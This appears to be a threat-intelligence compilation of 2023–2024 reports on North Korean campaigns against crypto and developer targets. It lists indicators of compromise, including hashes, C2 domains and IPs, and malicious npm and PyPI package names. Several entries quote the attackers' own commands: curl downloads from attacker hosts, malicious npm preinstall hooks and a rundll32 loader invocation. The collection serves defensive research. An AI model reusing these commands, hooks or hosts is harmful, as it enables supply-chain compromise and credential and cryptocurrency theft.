    • Jump Crypto Investment Agreement.zip ba5e982596fd03bea98f5de96c1258e56327358e134ceecd1d68e54480533d92
    • Internal PDF Viewer.app.zip 3ed9f34fedca38130776e5adabae363ac797fe89087e04e0c93d83fd62a7a9a4
    • ZIP 6ca3a2f4cef27dac9d28c1ec2b29a8fa09dfc6dbbaf58e00dddbf5c1dd3b3cc3
    • Mach-O - Internal PDF Viewer c28e4031129f3e6e5c6fbd7b1cebd8dd21b6f87a8564b0fb9ee741a9b8bc0197
    • Mach-O e2f177b8806923f21a93952b61aedbeb02d829a67a820a7aab5ee72512e3d646
    • Mach-O d6d367453c513445313be7339666e4faeeebeae71620c187012ea5ae2901df34
    • PDF - Jump Crypto Investment Agreement.pdf (Key PDF) 5f00106f7f15e0ca00df4dbb0eeccd57930b4b81bc9aa3fca0c5af4eda339ab7
    • PDF - Readme.pdf (Instruction to use the fake reader) ebad7317e1b01c2231bdbf37dfebdf656e3c8706e719fd37b66f0170b3d5cae0
  • RustBucket MacOS version - 2023-05-02
    • ZIP Internal PDF Viewer.app.zip dda8a9e2a2e415be781a39fdf41f1551af2344f1b1a0ddf921d8aeba90343d1b
    • Mach-O Internal PDF Viewer 46db9f2fc879bf643a8f05e2b35879b235cbb04aa06fe548f0bc7c7c02483cf3
    • Mach-O 5072b28399c874f92e71793fa13207d946a28a2f5903365ac11ddf666d15d086
    • Mach-O 3f0d5ddca2657044f4763ae53c4f33c8a7814ba451b60d24430a126674125624
  • RustBucket MacOS version - 2023-04-23
    • cloud.dnx.capital
    • laos.hedgehogvc.us
    • 104.255.172.56
    • ZIP - Internal PDF Viewer 2.app.zip 61772375af1884fe73c5d154b8637dd62f26d23bc38d18462a88e2bbed483fd7
    • SCPT - main.scpt 7c66d2d75be43d2c17e75d37c39344a9b5d29ee5c5861f178aa7d9f34208eb48
    • ZIP - Internal PDF Viewer.zip ff8832355ae99ffd66d0fe9eda2d74efdf3ed87bb2a4c215b93ade93165f7c0b
    • ZIP - Internal PDF Viewer.app.zip 83f457bc81514ec5e3ea123fc237811a36da6ce7f975ad56d62e34af4d1f37c0
    • ZIP - Internal PDF Viewer 3.app.zip b68bf400a23b1053f54911a2b826d341f6bf87c26bea5e6cf21710ee569a7aab
    • Mach-O - PdfWriter 3b6f30369a4ee8bf9409d141b6d1b3fb4286c34984b5de005ed7431df549b17e
  • RustBucket MacOS version - 2023-04-21
    • Mach-O - 703517604263 - 9ca914b1cfa8c0ba021b9e00bda71f36cad132f27cf16bda6d937badee66c747
    • Mach-O - ec8f97d5595d92ec678ffbf5ae1f60ce90e620088927f751c76935c46aa7dc41
    • Mach-O - 7fccc871c889a4f4c13a977fdd5f062d6de23c3ffd27e72661c986fae6370387
  • RustBucket MacOS version - 2023-03-02
    • ZIP - Internal PDF Viewer.app.zip - b448381f244dc0072abd4f52e01ca93efaebb2c0a8ea8901c4725ecb1b2b0656
    • ZIP - Pdf Viewer.zip - c56a97efd6d3470e14193ac9e194fa46d495e3dddc918219cca530b90f01d11e
    • Mach-O - Internal PDF Viewer - bea33fb3205319868784c028418411ee796d6ee3dfe9309f143e7e8106116a49
  • RustBucket MacOS version - 2023-02-13 (creation date 2022-12-20)
    • ZIP - Pdf Viewer.zip - 0d6964fe763c2e6404cde68af2c5f86d34cf50a88bd81bc06bba739010821db0
    • ZIP - Internal PDF Viewer.app.zip - ea5fac3201a09c3c5c3701723ea9a5fec8bbc4f1f236463d651303f40a245452
    • ZIP - Internal PDF Viewer.app.zip - 9525f5081a5a7ab7d35cf2fb2d7524e0777e37fe3df62730e1e7de50506850f7
    • Mach-O - Internal PDF Viewer - e74e8cdf887ae2de25590c55cb52dad66f0135ad4a1df224155f772554ea970c
    • Mach-O - 38106b043ede31a66596299f17254d3f23cbe1f983674bf9ead5006e0f0bf880
    • Mach-O - 7981ebf35b5eff8be2f3849c8f3085b9cec10d9759ff4d3afd46990520de0407
  • RustBucket Windows version
    • ZIP - PdfViewer.zip 62a5c6a600051bca4f7b3d11508ca1f968006b71089c71bf87b83ea8b34188e3
    • PDF - DOJ Report on Bizlato Investigation.pdf 8e234482db790fa0a3d2bf5f7084ec4cfb74bffd5f6cbdc5abdbc1350f58e3fe
    • DLL - DevExpress.Xpr.v19.2.dll f603713bffb9e040bedfd0bb675ff5a6b3205d8bd4e1a3309ea6d1b608871184
    • DLL - DevExpress.XtraList.v19.2.dll 31cec2803bfc7750930d5864400388732a822da96c3f79c98ddee03949aa6a2d
    • EXE - PdfViewer.exe b3cb7d0b656e8e4852def8548d2cf1edc4e64116434e1f2d9c9b150ee0f9861e
    • safe.doc-share.cloud
    • 172.93.181.221
    • Key PDF file 2 - PDF - DOJ Report on Bizlato Investigation_asistant.pdf 07d206664a8d397273e69ce37ef7cf933c22e93b62d95b673d6e835876feba06
    • safe.doc-share.cloud
  • IPs and Domains:
    • 104.156.149.130 (2023-04-18)
    • 104.255.172.52 (2023-03-18)
    • 104.234.147.28 (2023-01-21)
    • 104.168.138.7 (2023-03-17)
    • 104.168.167.88 (2022-10-17)
    • 155.138.159.45 (2022-09-20)
    • 104.255.172.56 (2022-09-15 - 2023-04-11)
    • 172.93.181.221 (2022-12-28 - 2023-03-06)
    • 172.86.121.143 (2022-10-31 - 2022-12-21)
    • 172.86.121.130 (2022-10-25 - 2023-01-24)
    • 149.28.247.34 (2022-11-11 - 2022-11-11)
    • 152.89.247.87 (2022-09-15 - 2022-10-24)
    • 104.168.174.80 (2022-06-28 - 2022-09-16)
    • 149.248.52.31 (2022-08-05 - 2022-08-31)
    • 155.138.219.140 (2022-07-17 - 2022-08-16)

Kimsuky - Kimsuky Strikes Again | New Social Engineering Campaign Aims to Steal Credentials and Gather Strategic Intelligence

  • Date:: 2023-06-06
  • Kimsuky conducted a social engineering campaign targeting experts in DPRK issues to steal Google and subscription credentials of a reputable news and analysis service focusing on the DPRK, as well as deliver reconnaissance malware. Kimsuky also engaged in extensive email correspondence and used spoofed URLs, websites imitating legitimate web platforms and Office documents weaponized with the ReconShark malware. The activity indicates Kimsuky’s growing dedication to social engineering and highlights the group’s increasing interest in gathering strategic intelligence.
  • https://sentinelone.com/labs/kimsuky-new-social-engineering-campaign-aims-to-steal-credentials-and-gather-strategic-intelligence/

North Korea-Aligned TAG-71 Spoofs Financial Institutions in Asia and US

Report: North Korean Hackers Have Stolen $3 Billion Worth of Crypto

Fragments of Cross-Platform Backdoor Hint at Larger Mac OS Attack

  • Date:: 2023-06-13
  • https://bitdefender.com/blog/labs/fragments-of-cross-platform-backdoor-hint-at-larger-mac-os-attack/
  • During routine detection maintenance, our Mac researchers stumbled upon a small set of files with backdoor capabilities that seem to form part of a more complex malware toolkit. The following analysis is incomplete, as we are trying to identify the puzzle pieces that are still missing.
  • Two of the three isolated samples are generic backdoors written in Python that seem to target Mac OS, Windows and Linux-based operating systems.
  • www.git-hub.me/view.php

Andariel’s silly mistakes and a new malware family

Recorded Future: North Korea’s Cyber Strategy

⭐ Phylum: Sophisticated Ongoing Attack on NPM

  • Date:: 2023-06-23

  • https://blog.phylum.io/sophisticated-ongoing-attack-discovered-on-npm/

  • https://blog.phylum.io/junes-sophisticated-npm-attack-attributed-to-north-korea/

  • chart-tablejs

  • sync-request

  • "preinstall": "npm install sync-request && node main.js"

  • Stage 1 jpeg-metadata ~/.vscode/jsontoken npmrepos.com checkupdate.php

  • Stage 2 ttf-metadata ~/.vscode/jsontoken npmrepos.com getupdate.php

  • Stage 1 chart-tablejs ~/.cprice/pricetoken tradingprice.net checktoken.php

  • Stage 2 vuewjs ~/.cprice/pricetoken tradingprice.net getbprice.php

  • Stage 1 chart-vxe ~/.cprice/pricetoken tradingprice.net checktoken.php

  • Stage 2 vue-gws ~/.cprice/pricetoken tradingprice.net getbprice.php

  • Stage 1 elliptic-helper ~/.vscode/jsontoken npmcloudjs.com checkupdate.php

  • Stage 2 elliptic-parser ~/.vscode/jsontoken npmcloudjs.com getupdate.php

  • Stage 1 price-fetch ~/.cprice/pricetoken bi2price.com checktoken.php

  • Stage 2 price-record ~/.cprice/pricetoken bi2price.com getbprice.php

  • Stage 1 btc-web3 ~/.cprice/pricetoken bi2price.com checktoken.php

  • Stage 2 other-web3 ~/.cprice/pricetoken bi2price.com getbprice.php

  • Stage 1 assets-graph ~/.cprice/pricetoken bi2price.com checktoken.php

  • Stage 2 assets-table ~/.cprice/pricetoken bi2price.com getbprice.php

  • Stage 1 tslib-react ~/.vscode/jsontoken npmjsregister.com checkupdate.php

  • Stage 2 tslib-util ~/.vscode/jsontoken npmjsregister.com getupdate.php

  • Stage 1 audit-ejs ~/.npm/audit-cache npmjsregister.com auditcheck.php

  • Stage 2 audit-vue ~/.npm/audit-cache npmjsregister.com getcheckjs.php

  • Stage 1 ejs-audit ~/.npm/audit-cache npmjsregister.com auditcheck.php

  • Stage 2 vue-audit ~/.npm/audit-cache npmjsregister.com getcheckjs.php

  • Stage 1 cache-vue ~/.config/npmcache npmjsregister.com auditcheck.php

  • Stage 2 cache-react ~/.config/npmcache npmjsregister.com getcheckjs.php

  • Stage 1 sync-http-api ~/.config/npmcache npmjsregister.com auditcheck.php

  • Stage 2 sync-https-api ~/.config/npmcache npmjsregister.com getcheckjs.php

  • Stage 1 couchcache-audit ~/.audit/npmcache npmjsregister.com auditcheck.php

  • Stage 2 snykaudit-helper ~/.audit/npmcache npmjsregister.com getcheckjs.php

  • 142.44.178.222

  • 5.135.199.12

  • 188.68.229.49

  • 91.195.240.12

  • 216.189.145.247

⭐ Github: Security alert: social engineering campaign targets technology industry employees

  • Date:: 2023-07-18
  • https://github.blog/security/vulnerability-research/security-alert-social-engineering-campaign-targets-technology-industry-employees/
  • Jade Sleet impersonates a developer or recruiter by creating one or more fake persona accounts on GitHub and other social media providers. Thus far, we have identified fake personas that operated on LinkedIn, Slack, and Telegram.
  • Domains:: npmjscloud.com npmrepos.com cryptopriceoffer.com tradingprice.net npmjsregister.com bi2price.com npmaudit.com coingeckoprice.com
  • npm packages:: assets-graph assets-table audit-ejs audit-vue binance-prices coingecko-prices btc-web3 cache-react cache-vue chart-tablejs chart-vxe couchcache-audit ejs-audit elliptic-helper elliptic-parser eth-api-node jpeg-metadata other-web3 price-fetch price-record snykaudit-helper sync-http-api sync-https-api tslib-react tslib-util ttf-metadata vue-audit vue-gws vuewjs
  • GitHub accounts:: GalaxyStarTeam Cryptowares Cryptoinnowise netgolden
  • npm accounts:: charlestom2023 eflodzumibreathbn galaxystardev garik.khasmatulin.76 hydsapprokoennl leimudkegoraie3 leshakov-mikhail linglidekili9g mashulya.bakhromkina mayvilkushiot outmentsurehauw3 paupadanberk pormokaiprevdz podomarev.goga teticseidiff51 toimanswotsuphous ufbejishisol

SentinelOne: JokerSpy | Unknown Adversary Targeting Organizations with Multi-Stage macOS Malware

⭐ JumpCloud: Attacker Infrastructure Links Compromise to North Korean APT Activity

Initial research exposing JOKERSPY

  • Date:: 2023-06-20
  • https://elastic.co/security-labs/inital-research-of-jokerspy
  • An overview of JOKERSPY, discovered in June 2023, which deployed custom and open source macOS tools to exploit a cryptocurrency exchange located in Japan.
  • sh.py is a Python backdoor used to deploy and execute other post-exploitation capabilities like Swiftbelt .
  • app.influmarket.org

How DPRK’s macOS RustBucket Seeks to Evade Analysis and Detection

The DPRK strikes using a new variant of RUSTBUCKET

  • Date:: 2023-07-13
  • https://elastic.co/security-labs/DPRK-strikes-using-a-new-variant-of-rustbucket
  • RustBucket, Bluenoroff, DangerousPassword
  • do shell script "curl -o \"/users/shared/Potential Risks of Cryptocurrency Assets.pdf\" https://crypto.hondchain.com/OuhVX8sdV21/HBKPHFlbyt/9zkMp5L5HS/fP7saoS3GZ/7fVinrx -A cur1-agent"
  • 104.168.167.88
  • C2:: crypto.hondchain.com
  • C2:: starbucls.xyz
  • C2:: jaicvc.com
  • C2:: docsend.linkpc.net (dynamic DNS domain)

GitHub Security Alert: Social engineering campaign targets technology industry employees

DangerousPassword attacks targeting developers’ Windows, macOS, and Linux environments

  • Date:: 2023-07-19
  • https://blogs.jpcert.or.jp/en/2023/07/dangerouspassword_dev.html
  • At the end of May 2023, JPCERT/CC confirmed an attack targeting developers of cryptocurrency exchange businesses, and it is considered to be related to the targeted attack group DangerousPassword [1], [2] (a.k.a. CryptoMimic or SnatchCrypto), which has been continuously attacking since June 2019. This attack targeted Windows, macOS, and Linux environments with Python and Node.js installed on the machine. This article explains the attack that JPCERT/CC has confirmed and the malware used.
  • Python malware is simple downloader-type malware that downloads and executes MSI files from an external source. As shown in Figure 2, it is characterized by its extensive use of ROT13 to obfuscate C2 strings and other strings used.
  • app.developcore.org
  • pkginstall.net
  • www.git-hub.me
  • checkdevinc.com

The CoinsPaid Hack Explained: We Know Exactly How Attackers Stole and Laundered $37M USD

Mandiant: North Korea Leverages SaaS Provider in a Targeted Supply Chain Attack (JumpCloud)

Scarcruft - Detecting Ongoing STARK#MULE Attack Campaign Targeting Victims Using US Military Document Lures

Kimsuky - Spreading malware disguised as coin and investment-related content

ReversingLabs: VMConnect - Malicious PyPI packages imitate popular open source modules

  • Date:: 2023-08-03
  • https://reversinglabs.com/blog/vmconnect-malicious-pypi-packages-imitate-popular-open-source-modules
  • New malicious PyPI campaign that includes a suspicious VMConnect package published to the PyPI repo.
  • When we decode the string, we discovered that it contains a download URL which is modified based on the information collected from the host machine. The substring paperpin3902 in the command and control URL is replaced with a string containing the first letter of the host’s platform name, username and a random, 6 character-long string.
  • C2:: 45.61.139.219
  • C2:: ethertestnet.pro
  • C2:: deliworkshopexpress.xyz

FBI Identifies Cryptocurrency Funds Stolen by DPRK

US arrests Tornado Cash co-founder, sanctions another who remains at large

Lazarus Group's infrastructure reuse leads to discovery of new malware

VMConnect supply chain attack continues, evidence points to North Korea

Mandiant: APT38 - Un-usual Suspects

Lazarus luring employees with trojanized coding challenges: The case of a Spanish aerospace company

Active North Korean campaign targeting security researchers

  • Date:: 2023-09-07
  • In January 2021, a DPRK cyber actor campaign was publicly disclosed, in which they used 0-day exploits to target security researchers working on vulnerability research and development. Over the past two and a half years, the campaign has continued. Recently, DPRK cyber actors were found to likely be responsible for a new, similar campaign, with at least one actively exploited 0- day being used to target security researchers in the past several weeks. DPRK threat actors used social media sites like X (formerly Twitter) to build rapport with their targets. After initial contact via X, they moved to an encrypted messaging app such as Signal, WhatsApp or Wire. Once a relationship was developed with a targeted researcher, the threat actors sent a malicious file that contained at least one 0-day in a popular software package. Upon successful exploitation, the shellcode conducts a series of anti-virtual machine checks and then sends the collected information, along with a screenshot, back to an attacker-controlled command and control domain. The shellcode used in this exploit is constructed in a similar manner to shellcode observed in previous North Korean exploits.
  • https://blog.google/threat-analysis-group/active-north-korean-campaign-targeting-security-researchers/

Scarcruft exploits WinRAR vulnerability (CVE-2023-38831) targeting the cryptocurrency industry

  • Date:: 2023-09-18
  • https://paper.seebug.org/3033/
  • This recent wave of attacks is noteworthy for revealing that, apart from the Lazarus Group, there are other North Korean-affiliated entities engaging in targeted operations against the cryptocurrency industry, which is relatively uncommon in the security community.
  • The targets of this Konni group's recent attacks are notably different from their previous activities. Judging by the lure name, the attacks are directed towards the cryptocurrency industry. It is speculated that Konni may be exploring new attack vectors. The captured sample named "wallet_Screenshot_2023_09_06_Qbao_Network.zip", and it references Qbao Network, which is described as follows:

Lazarus Group’s Undercover Operations 2022–2023 - L. Taewoo, S. Lee & D. Kim

How North Korean Workers Tricked U.S. Companies into Hiring Them and Secretly Funneled Their Earnings into Weapons Programs

TeamCity CVE-2023-42793 / CyberLink Supply Chain Attack

Lazarus’ New Campaign Exploiting Legitimate Software

Deep Dive into the Lazarus Group's Foray into macOS

  • Date:: 2023-10-29
  • https://slideshare.net/MITREATTACK/exploring-the-labyrinth-deep-dive-into-the-lazarus-groups-foray-into-macos
  • This talk will deep dive into the interactive macOS intrusions Crowdstrike has attributed to LABYRINTH CHOLLIMA. We will delve into the adversary's macOS tradecraft, techniques to circumvent existing OS protections, and social engineering tactics, while showcasing how their mechanisms and tooling map to the MITRE ATT&CK kill chain, featuring some newly proposed MITRE techniques related to the Transparency, Consent, and Control (TCC) database.

FastViewer Variant Merged with FastSpy and disguised as a Legitimate Mobile Application

  • Date:: 2023-10-30
  • Kimsuky has created a FastViewer variant that induces a victim to install the app onto their mobile device by disguising the malware as a legitimate Android application (APK file), such as Google Authenticator, an anti-virus program, or a payment service application. The FastViewer malware receives commands directly from the server without downloading additional malware, and the main purpose of this FastViewer variant is to steal information from infected devices. It appears that Kimsuky has developed this malware since at least July 2023 to target Republic of Korea victims. The report further notes that the disguised applications are expected to be distributed via spearphishing emails or smishing to trick targets into running them
  • https://medium.com/s2wblog/fastviewer-variant-merged-with-fastspy-and-disguised-as-a-legitimate-mobile-application-f3004588f95c

Lazarus Targets Bloackchain Engineers With New KandyKorn macOS Malware in attacks against blockchain engineers.

Kimsuky - Operation Covert Stalker

King of Thieves - Black Alicanto and the Ecosystem of North Korea Based Cyber Operations

  • Date:: 2023-11-01
  • https://sansorg.egnyte.com/dl/3P3HxFiNgL
  • Sapphire Sleet (COPERNICIUM), APT38, Bluenoroff, TA444, DangerousPassword, CryptoCore, CryptoMimic, Stardust Chollima
  • Social engineering mainly via email or social media (LinkedIn, Discord)
  • cryptowave.capital daiwa.ventures
  • Lure themes: US regulatory action, Risks of stablecoins, Pitch Deck, Investment agreements, Presentations (Protected), Salary Adjustments
  • “DangerousPassword” was known for Password.txt.lnk
  • 2023 is the year of SecurePDF (or PDFReader, PDFViewer)

⭐ Crypto-Themed npm Packages Found Delivering Stealthy Malware

  • Date:: 2023-11-04
  • https://blog.phylum.io/crypto-themed-npm-packages-found-delivering-stealthy-malware/
  • Now that they’re done executing the PowerShell script, it’s immediately deleted to clean up the trace of its existence.
  • "preinstall": "node index.js && del index.js"
  • curl -o sqlite.a -L "<http://103.179.142.171/npm/npm.mov>" > nul 2>&1
  • npm.mov
  • puma-com 5.0.3 2023-10-30 troll1234 [email protected]
  • erc20-testenv 5.0.3 2023-10-31 terek1234 [email protected]
  • blockledger 5.0.3 2023-10-31 xxx145465 [email protected]
  • cryptotransact 5.0.3 2023-10-31 sandwich1901001 [email protected]
  • chainflow 5.0.3 2023-11-02 troll1234 [email protected]
  • In each package, the package.json file lists the following GitHub repository:
  • "url": "git+https://github.com/jhonnpmdev/config-envi.git"
  • "url": "<https://github.com/johnsoncolin99325/dev-config.git>"
  • "url": "git://github.com/motdotla/dotenv.git"
  • The actor went through several iterations of development in the dev-config repo making modest changes until this early prototype was completed and published on 14 Sep 2023 under the name dot-environment v.1.1.0.
  • Most notably, the resource that the malware called out to was found at 91.206.178.125/files/npm.mov a Polish IP address.
  • https://app.spur.us/context?q=91.206.178.125 -- Artnet Sp. z o.o., Datacener, PL, OperaVPS
  • https://app.spur.us/context?q=103.179.142.171 -- Evoxt Enterprise, Los Angeles CA

Microsoft: BlueNoroff hackers plan new crypto-theft attacks

Jamf - BlueNoroff strikes again with new macOS malware

Two South Koreans indicted for allegedly colluding with North Korean hackers

Palo Alto - Hacking Employers and Seeking Employment: Two Job-Related Campaigns Bear Hallmarks of North Korean Threat Actors

Korean gov’t officials targeted by North’s ‘journalist’ crypto hackers

Microsoft:Diamond Sleet supply chain compromise distributes a modified CyberLink installer

  • Date:: 2023-11-22
  • https://microsoft.com/en-us/security/blog/2023/11/22/diamond-sleet-supply-chain-compromise-distributes-a-modified-cyberlink-installer/)
  • Microsoft has observed suspicious activity associated with the modified CyberLink installer file as early as October 20, 2023. The malicious file has been seen on over 100 devices in multiple countries, including Japan, Taiwan, Canada, and the United States. While Microsoft has not yet identified hands-on-keyboard activity carried out after compromise via this malware, the group has historically:
  • If these criteria are not met, the executable continues running the CyberLink software and abandons further execution of malicious code. Otherwise, the software attempts to contact one of three URLs to download the second-stage payload embedded inside a file masquerading as a PNG file using the static User-Agent ‘Microsoft Internet Explorer’
  • When invoked, the in-memory executable attempts to contact the following callbacks for further instruction. Both domains are legitimate but have been compromised by Diamond Sleet.

Operation Dream Magic, MagicLine4NX - Hackers use zero-day in supply-chain attack

SentinelOne: DPRK Crypto Theft | macOS RustBucket Droppers Pivot to Deliver KandyKorn Payloads

  • Date:: 2023-11-27
  • https://sentinelone.com/blog/dprk-crypto-theft-macos-rustbucket-droppers-pivot-to-deliver-kandykorn-payloads/
  • https://x.com/KSeznec/status/1717542794942660771
  • North Korean-aligned threat actors targeting macOS have had a busy 2023, with two major campaigns noted so far: RustBucket and KandyKorn. The initial RustBucket campaign used a second-stage malware, dubbed ‘SwiftLoader’, which functioned externally as a PDF Viewer for a lure document sent to targets. While victims viewed the lure, SwiftLoader retrieved and executed a further stage malware written in Rust. The KandyKorn campaign, meanwhile, was an elaborate multi-stage operation targeting blockchain engineers of a crypto exchange platform. Python scripts were used to drop malware that hijacked the host’s installed Discord app, and subsequently delivered a backdoor RAT written in C++ dubbed ‘KandyKorn’.
  • Research by Elastic published in early November 2023 described a sophisticated intrusion by DPRK-aligned threat actors. The compromise involved a five-stage attack that began with social engineering via Discord to trick targets into downloading a malicious Python application disguised as a cryptocurrency arbitrage bot, a popular tool among crypto traders. The Python application was distributed as Cross-Platform Bridges.zip and contained multiple benign Python scripts. We summarize the previous research into KandyKorn as follows:
  • Written in C++, SUGARLOADER checks for the existence of a configuration file at /Library/Caches/com.apple.safari.ck and downloads it from a remote C2 if missing. The C2 address is hardcoded into the FinderTools script and passed as an execution argument to the SUGARLOADER binary on the command line.
  • In the intrusion seen by Elastic, the C2 used by FinderTools was hosted on the domain tp.globa.xyz.
  • SUGARLOADER uses this to retrieve and execute the KANDYKORN remote access trojan in-memory via NSCreateObjectFileImageFromMemory and NSLinkModule. This technique has been used previously in North Korean macOS malware, starting with UnionCryptoTrader back in 2019.
  • A number of RustBucket variants have since been sighted. Additionaly, several variations of the Swift-based stager, collectively dubbed SwiftLoader, have come to light over the last few months.
  • docs-send.online/getBalance/usdt/ethereum
  • drive.google.com/file/d1KW5nQ8MZccug6Mp4QtKyWLT3HIZzHNIL2
  • on-global.xyz/Of56cYsfVV8/OJITWH2WFx/Jy5S7hSx0K/fP7saoiPBc/A%3D%3D
  • tp-globa.xyz/OdhLca1mLUp/lZ5rZPxWsh/7yZKYQI43S/fP7savDX6c/bfC
  • swissborg.blog/zxcv/bnm
  • 23.254.226.90
  • 104.168.214.151
  • 142.11.209.144
  • 192.119.64.43

FIOD + US Seizes Sinbad Crypto Mixer

US govt sanctions North Korea’s Kimsuky hacking group

Reuters: North Koreans use fake names, scripts to land remote IT work for cash

Alex Masmej Near Miss

Analysis of North Korean Hackers’ Targeted Phishing Scams on Telegram

BlueNoroff: new Trojan attacking macOS users

  • Date:: 2023-12-05
  • https://securelist.com/bluenoroff-new-macos-malware/111290/
  • We recently discovered a new variety of malicious loader that targets macOS, presumably linked to the BlueNoroff APT gang and its ongoing campaign known as RustBucket.
  • Earlier RustBucket versions spread its malicious payload via an app disguised as a PDF viewer. By contrast, this new variety was found inside a ZIP archive that contained a PDF file named, “Crypto-assets and their risks for financial stability”, with a thumbnail that showed a corresponding title page. The metadata preserved inside the ZIP archive suggests the app was created on October 21, 2023.
  • Written in Swift and named “EdoneViewer”, the executable is a universal format file that contains versions for both Intel and Apple Silicon chips. Decryption of the XOR-encrypted payload is handled by the main function, CalculateExtameGCD. While the decryption process is running, the app puts out unrelated messages to the terminal to try and lull the analyst’s vigilance.

⭐ Analysis of Suspected Lazarus (APT-Q-1) Attack Sample Targeting npm Package Supply Chain

Operation Blacksmith: Lazarus targets organizations worldwide using novel Telegram-based malware written in DLang

Koda's recent DPRK IoCs

To stem North Korea’s missiles program, White House looks to its hackers

Kimsuky Hackers Deploying AppleSeed, Meterpreter, and TinyNuke in Latest Attacks

"Obfuscated code a "recruiter" sent me"

⭐ Blockchain dev's wallet emptied in "job interview" using npm package

Phylum: Fake Developer Jobs Laced With Malware

  • Date:: 2023-12-20
  • https://blog.phylum.io/smuggling-malware-in-test-code/
  • npm package trying to masquerade as code profiler which actually installs several malicious scripts including a cryptocurrency and credential stealer
  • Attempted to hide the malicious code in a test file, presumably thinking that no one would bother to look for malware in test code.

2024

⭐ Phylum: Update to November’s Crypto-Themed npm Attack

  • Date:: 2024-01-05
  • https://blog.phylum.io/update-to-novembers-crypto-themed-npm-attack/
  • bitcore-transactions 1.2.1 2023-11-29
  • blockchain-contracts 5.0.4 2023-11-07
  • blockchain-transactions 5.0.3 2023-11-07
  • blockchaintestenv 3.2.2 2023-10-25
  • blockledger 5.0.3 2023-10-31
  • chainflow 5.0.3 2023-11-02
  • chainflowpro 5.0.5 2023-11-07
  • coincryptotest 5.0.1 2023-10-26
  • config-envi 0.0.1 2023-09-20
  • config-storages 3.41.2 2023-12-14
  • cryptotestenv 3.2.1 2023-10-25
  • cryptotransact 5.0.3 2023-10-31
  • dot-environment 1.1.0 2023-09-14
  • envi-conf 0.1.0 2023-09-26
  • envi-conf 0.1.3 2023-10-24
  • envi-config 0.1.1 2023-09-25
  • envision-config 0.1.1 2023-10-19
  • envision-config 0.1.3 2023-10-24
  • erc20-testenv 5.0.3 2023-10-31
  • feather-icons-pro 4.29.1 2023-11-28
  • port-common 1.0.0 2023-12-04
  • port-launcher 1 6.0.3 2023-11-13
  • puma-com 5.0.3 2023-10-30
  • simplecointest 5.0.0 2023-10-26
  • styled-beautify-components 6.1.6 2023-12-04
  • web3-core-subscription 6.1.6 2023-12-07

Comprehensive Report on North Korean Hackers, Phishing Groups, and Money Laundering in 2023

North Korea Threat Landscape Update

Funds Stolen from Crypto Platforms Fall More Than 50% in 2023, but Hacking Remains a Significant Threat as Number of Incidents Rises

CVE-2024-21338 - North Korea’s Lazarus deploys rootkit via AppLocker zero-day flaw

New Malicious PyPI Packages used by Lazarus

  • Date:: 2024-02-28
  • https://blogs.jpcert.or.jp/en/2024/02/lazarus_pypi.html
  • JPCERT/CC has confirmed that Lazarus has released malicious Python packages to PyPI.
  • This type of malware, called Comebacker, is the same type as that used by Lazarus to target security researchers in an attack reported by Google [1] in January 2021. The following sections describe the details of test.py.
  • In addition, the NOP code used in this sample has a unique characteristic. As shown in Figure 6, there is a command starting with 66 66 66 66 in the middle of the code. This is often used, especially in the decode and encode functions. This characteristic is also found in other types of malware used by Lazarus, including malware BLINDINGCAN.
  • After test.py is XOR-decoded, it is saved as output.py and then executed as a DLL file: $ rundll32 output.py,CalculateSum
  • pycryptoenv
  • pycryptoconf
  • quasarlib
  • swapmempool
  • blockchain-newtech.com/download/download.asp
  • fasttet.com/user/agency.asp
  • chaingrown.com/manage/manage.asp
  • 91.206.178.125/upload/upload.asp

SquidSquad | Phishing by Appointment: Suspected North Korean Hackers Target Blockchain Community Via Telegram

UN Security Council Report

  • Date:: 2024-03-07
  • According to a cybersecurity company, the IP address of the Kimsuky server hosting this malware is 144.76.109.61 and the IP address of another, related server hosting the Kimsuky-controlled domain civilarys.store is 27.255.81.77. Kimsuky-related email accounts associated with this campaign include luckgpu[@]gmail.com and abdulsamee7561[@]gmail.com. The malicious applications were likely distributed via spearphishing or smishing.

MurAll Hacked by Contagious Interview

  • Date:: 2024-03-05
  • https://t.me/investigations/97
  • 0x01720163e9385e832fFe3387ba7098be4dF303e0
  • 0x0cDB613Ec9a07E2AFE898F8519a0c0a981032118
  • 0x0520195f57c3a5fe886aa95778dafe684854b78c252d20f29cbe0c9c4c4bbddd

Contagious Interview | "test_interview.zip": 39785213364b84c1442d133c778bf5472d76d8ef13b58b32b8dd8ac0201c82ca

Contagious Interview | The Lazarus group appears to be currently reaching out to targets via LinkedIn and spreading malware

Contagious Interview | SlowMist: Lazarus group appears to be currently reaching out to targets via LinkedIn and steal employee privileges or assets through malware

re: DPRK IT Workers

SquidSquad | How Lazarus Group laundered $200M from 25+ crypto hacks to fiat from 2020–2023

Recruitment trap for blockchain practitioners: Analysis of suspected Lazarus (APT-Q-1) stealing operations

  • Date:: 2024-05-10
  • https://mp.weixin.qq.com/s/84lUaNSGo4lhQlpnCVUHfQ
  • Contagious Interview, BeaverTail, InvisibleFerret
  • Attackers create false identities on work platforms (such as LinkedIn, Upwork, Braintrust, etc.), disguised as employers, independent developers or startup founders, and publish job information with lucrative rewards or urgent tasks. The work content is usually software development or problem fixing.
  • Github:: plannet-plannet
  • Github:: bmstoreJ
  • Github:: CodePapaya
  • Github:: Allgoritex
  • Github:: bohinskamariia
  • Github:: danil33110
  • Github:: aluxiontemp
  • Github:: komeq1120
  • Github:: aufeine - Account active since 2024-04-15
  • Github:: dhayaprabhu - Account active since 2019. Malicious code base (dhayaprabhu/Crypto-Node.js) was first committed on 2024-02-01
  • Github:: MatheeshaMe - Account active since 2021. Malicious code repository (MatheeshaMe/etczunks-marketplace) submitted on 2023-10-11
  • Github:: Satyam-G5 - Account active since 2023. Malicious code repository (Satyam-G5/etczunks-marketplace) was forked from MatheeshaMe/etczunks-marketplace on 2023-10-12
  • Github:: emadmohd211 - Account active since 2021
  • Github:: alifarabi - Account active since 2020. Malicious code repository (alifarabi/organ-management) was first submitted on 2024-03-30
  • Bitbucket:: juandsuareza
  • Bitbucket:: freebling
  • C2:: 172.86.97.80:1224
  • C2:: 172.86.123.35:1244
  • C2:: 147.124.212.89:1244
  • C2:: 147.124.212.146:1244
  • C2:: 147.124.213.11:1244
  • C2:: 147.124.213.29:1244
  • C2:: 147.124.214.129:1244
  • C2:: 147.124.214.131:1244
  • C2:: 147.124.214.237:1244
  • C2:: 67.203.7.171:1244
  • C2:: 67.203.7.245:1244
  • C2:: 91.92.120.135:3000
  • C2:: 45.61.131.218:1245
  • C2:: 173.211.106.101:1245
  • Python Trojan, with C2 at 45.61.131.218:1245
  • Download a Python script for deploying AnyDesk from the URL "/adc/" of the first-stage C2 server (147.124.214.237:1244)

